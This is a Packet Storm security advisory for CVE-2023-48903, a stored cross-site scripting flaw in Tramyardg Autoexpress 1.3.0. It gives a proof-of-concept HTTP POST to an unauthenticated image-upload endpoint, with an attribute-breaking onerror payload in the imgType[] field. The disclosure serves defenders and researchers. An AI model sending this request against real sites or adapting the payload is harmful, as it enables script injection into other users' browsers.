Tramyardg Autoexpress 1.3.0 Cross Site Scripting ≈ Packet Storm

Home[1] Files[2] News[3] &[SERVICES_TAB] Contact[4] Add New[5]

Tramyardg Autoexpress 1.3.0 Cross Site Scripting[6]
Authored by Scott White[7]

Tramyardg Autoexpress version 1.3.0 suffers from a persistent cross site scripting vulnerability.

advisories | CVE-2023-48903[8]
SHA-256 | e5d38e6f27165a96b83eb9ff1357086d82ad45bbc6a91a8b4f1d9aa5f2e996a5

Change Mirror[12] Download[13]

        # Exploit Title: tramyardg autoexpress - Stored Cross-Site Scripting (XSS)
# Google Dork: N/A
# Date: 11/28/2023
# Exploit Author: Scott White
# Vendor Homepage: https://github.com/tramyardg/autoexpress
# Version: v1.3.0
# Tested on: Ubuntu 22.04.3 LTS + Apache/2.4.52
# CVE : CVE-2023-48903
# References:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-48903
https://www.cve.org/CVERecord?id=CVE-2023-48903
# Description:
Autoexpress 1.3.0 is affected by a stored cross-site scripting (XSS) feature that allows for an unauthenticated attacker to execute JavaScript commands.
# Proof of Concept:
+ Go to "http://localhost/autoexpress"
+ Craft POST request to /autoexpress/admin/api/uploadCarImages.php within BurpSuite (Repeater)
+ The form-data name "imageType[]" is vulnerable
# Sample Request
POST /autoexpress/admin/api/uploadCarImages.php HTTP/1.1
Host: localhost
Content-Length: 17016
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9juDWgTa5YsjE2YR
Origin: http://localhost
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
------WebKitFormBoundary9juDWgTa5YsjE2YR
Content-Disposition: form-data; name="files[]"; filename="image.jpeg"
Content-Type: image/jpeg
IMAGE_CONTENT
------WebKitFormBoundary9juDWgTa5YsjE2YR
Content-Disposition: form-data; name="id"
CAR_ID
------WebKitFormBoundary9juDWgTa5YsjE2YR
Content-Disposition: form-data; name="fd[]"
IMAGE_CONTENT_BASE64_ENCODED
------WebKitFormBoundary9juDWgTa5YsjE2YR
Content-Disposition: form-data; name="imgType[]"
data:image/jpeg;base64"onerror=alert(1002)<!--------WebKitFormBoundary9juDWgTa5YsjE2YR--

Login[14] or Register[15] to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa

File Tags

File Archives

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services[120]
Hosting By
Rokasec[121]
close
Image

Pensée du jour :

Ce que l'homme a fait ,

l'homme peut le défaire.

 

"No secure path in the world"